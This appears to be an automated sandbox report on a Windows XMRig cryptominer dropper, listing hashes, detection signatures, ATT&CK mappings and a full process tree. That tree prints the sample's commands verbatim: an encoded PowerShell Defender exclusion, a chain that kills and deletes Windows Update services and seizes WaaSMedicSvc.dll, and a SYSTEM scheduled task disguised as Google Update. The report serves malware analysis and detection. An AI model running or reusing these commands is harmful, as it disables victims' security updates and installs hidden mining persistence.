Analysis

  • max time kernel
    300s
  • max time network
    273s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    01-07-2022 22:15

General

  • Target

    5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7.exe

  • Size

    7.4MB

  • MD5

    26e4e44c3ba14cdaf5a9994192aaf2a5

  • SHA1

    1422aa1e3462da9cf4d96e3ade9310b383c40ebb

  • SHA256

    5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7

  • SHA512

    18babf7c5ee51848061cff36ffdbab814bf5f6404d067ddd48f16cb168a99a7964c6a6b49cd1e44f222c77527eed2736946ec7bdd484271d243efdf7c51903ad

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 2 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7.exe
    "C:\Users\Admin\AppData\Local\Temp\5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3164
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:1480
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4984
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1716
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4912
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:3612
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:2300
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:4148
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:4732
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:1384
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:4668
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:1596
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:2288
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:2436
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:1208
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:64
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:860
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            5⤵
              PID:2560
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
              5⤵
                PID:5108
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                5⤵
                  PID:3132
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                  5⤵
                    PID:348
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                    5⤵
                      PID:2812
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                      5⤵
                        PID:388
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                        5⤵
                          PID:4164
                        • C:\Windows\system32\reg.exe
                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                          5⤵
                          • Modifies registry key
                          PID:4064
                        • C:\Windows\system32\reg.exe
                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                          5⤵
                          • Modifies registry key
                          PID:4780
                        • C:\Windows\system32\reg.exe
                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                          5⤵
                          • Modifies registry key
                          PID:4824
                        • C:\Windows\system32\reg.exe
                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                          5⤵
                          • Modifies registry key
                          PID:5116
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4812
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:916
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3968
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3952
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                            PID:4088
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                          4⤵
                            PID:3688
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                            4⤵
                              PID:648
                              • C:\Windows\system32\schtasks.exe
                                schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                5⤵
                                  PID:4604
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
                            2⤵
                              PID:64
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
                              2⤵
                              • Drops startup file
                              PID:2580
                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                            1⤵
                            • Drops file in Windows directory
                            • Modifies Internet Explorer settings
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:3180
                          • C:\Windows\system32\browser_broker.exe
                            C:\Windows\system32\browser_broker.exe -Embedding
                            1⤵
                            • Modifies Internet Explorer settings
                            PID:4212
                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                            1⤵
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:580
                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                            1⤵
                            • Drops file in Windows directory
                            • Modifies Internet Explorer settings
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            PID:192
                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                            1⤵
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4464
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
                            1⤵
                              PID:4164
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                              1⤵
                              • Creates scheduled task(s)
                              PID:5104
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              1⤵
                                PID:64
                              • C:\Program Files\Chrome\updater.exe
                                "C:\Program Files\Chrome\updater.exe"
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:2972
                                • C:\Windows\System32\conhost.exe
                                  "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                                  2⤵
                                  • Drops file in Drivers directory
                                  • Drops file in System32 directory
                                  • Suspicious use of SetThreadContext
                                  • Drops file in Program Files directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4668
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
                                    3⤵
                                      PID:4648
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                      3⤵
                                        PID:348
                                        • C:\Windows\system32\sc.exe
                                          sc stop dosvc
                                          4⤵
                                          • Launches sc.exe
                                          PID:3964
                                        • C:\Windows\system32\sc.exe
                                          sc stop bits
                                          4⤵
                                          • Launches sc.exe
                                          PID:5044
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                          4⤵
                                          • Modifies registry key
                                          PID:5040
                                        • C:\Windows\system32\takeown.exe
                                          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2364
                                        • C:\Windows\system32\icacls.exe
                                          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          PID:220
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                          4⤵
                                          • Modifies registry key
                                          PID:4280
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                          4⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4164
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                          4⤵
                                            PID:3452
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                            4⤵
                                              PID:4780
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                              4⤵
                                                PID:3168
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                4⤵
                                                  PID:4176
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                  4⤵
                                                    PID:360
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                    4⤵
                                                      PID:1156
                                                    • C:\Windows\system32\reg.exe
                                                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                      4⤵
                                                      • Modifies registry key
                                                      PID:4896
                                                    • C:\Windows\system32\reg.exe
                                                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                      4⤵
                                                      • Modifies registry key
                                                      PID:3500
                                                    • C:\Windows\system32\reg.exe
                                                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                      4⤵
                                                      • Modifies registry key
                                                      PID:4156
                                                    • C:\Windows\system32\reg.exe
                                                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                      4⤵
                                                      • Modifies registry key
                                                      PID:4404
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                      4⤵
                                                      • Modifies registry key
                                                      PID:3312
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                      4⤵
                                                      • Modifies registry key
                                                      PID:4736
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                      4⤵
                                                      • Modifies registry key
                                                      PID:760
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop wuauserv
                                                      4⤵
                                                      • Launches sc.exe
                                                      PID:2612
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop WaaSMedicSvc
                                                      4⤵
                                                      • Launches sc.exe
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4088
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop UsoSvc
                                                      4⤵
                                                      • Launches sc.exe
                                                      PID:1332
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      4⤵
                                                        PID:1384
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                      3⤵
                                                        PID:4804
                                                        • C:\Windows\system32\powercfg.exe
                                                          powercfg /x -standby-timeout-dc 0
                                                          4⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5056
                                                        • C:\Windows\system32\powercfg.exe
                                                          powercfg /x -standby-timeout-ac 0
                                                          4⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3328
                                                        • C:\Windows\system32\powercfg.exe
                                                          powercfg /x -hibernate-timeout-dc 0
                                                          4⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4772
                                                        • C:\Windows\system32\powercfg.exe
                                                          powercfg /x -hibernate-timeout-ac 0
                                                          4⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:984
                                                      • C:\Windows\System32\conhost.exe
                                                        C:\Windows\System32\conhost.exe
                                                        3⤵
                                                          PID:2784
                                                          • C:\Windows\System32\conhost.exe
                                                            "C:\Windows\System32\conhost.exe" "mjadcdpvfkxx"
                                                            4⤵
                                                              PID:852
                                                          • C:\Windows\explorer.exe
                                                            C:\Windows\explorer.exe mkapcxrks1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                            3⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:8
                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                        1⤵
                                                        • Modifies registry class
                                                        PID:1448
                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                        1⤵
                                                        • Modifies registry class
                                                        PID:1900
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
                                                        1⤵
                                                        • Drops file in System32 directory
                                                        • Modifies data under HKEY_USERS
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5116

                                                      Network

                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                      Execution

                                                      Scheduled Task

                                                      1
                                                      T1053

                                                      Persistence

                                                      Modify Existing Service

                                                      2
                                                      T1031

                                                      Scheduled Task

                                                      1
                                                      T1053

                                                      Privilege Escalation

                                                      Scheduled Task

                                                      1
                                                      T1053

                                                      Defense Evasion

                                                      Modify Registry

                                                      3
                                                      T1112

                                                      Virtualization/Sandbox Evasion

                                                      1
                                                      T1497

                                                      Impair Defenses

                                                      1
                                                      T1562

                                                      File Permissions Modification

                                                      1
                                                      T1222

                                                      Discovery

                                                      Query Registry

                                                      2
                                                      T1012

                                                      Virtualization/Sandbox Evasion

                                                      1
                                                      T1497

                                                      System Information Discovery

                                                      3
                                                      T1082

                                                      Impact

                                                      Service Stop

                                                      1
                                                      T1489

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Program Files\Chrome\updater.exe
                                                        Filesize

                                                        7.1MB

                                                        MD5

                                                        e5373f1e2c782659695c5cea587fddea

                                                        SHA1

                                                        4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                        SHA256

                                                        c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                        SHA512

                                                        2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                                      • C:\Program Files\Chrome\updater.exe
                                                        Filesize

                                                        7.1MB

                                                        MD5

                                                        e5373f1e2c782659695c5cea587fddea

                                                        SHA1

                                                        4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                        SHA256

                                                        c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                        SHA512

                                                        2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                                      • C:\Windows\Temp\lol.bat
                                                        Filesize

                                                        59B

                                                        MD5

                                                        f580e0e80cc87b25e38ea2c0c8059d04

                                                        SHA1

                                                        299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                        SHA256

                                                        9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                        SHA512

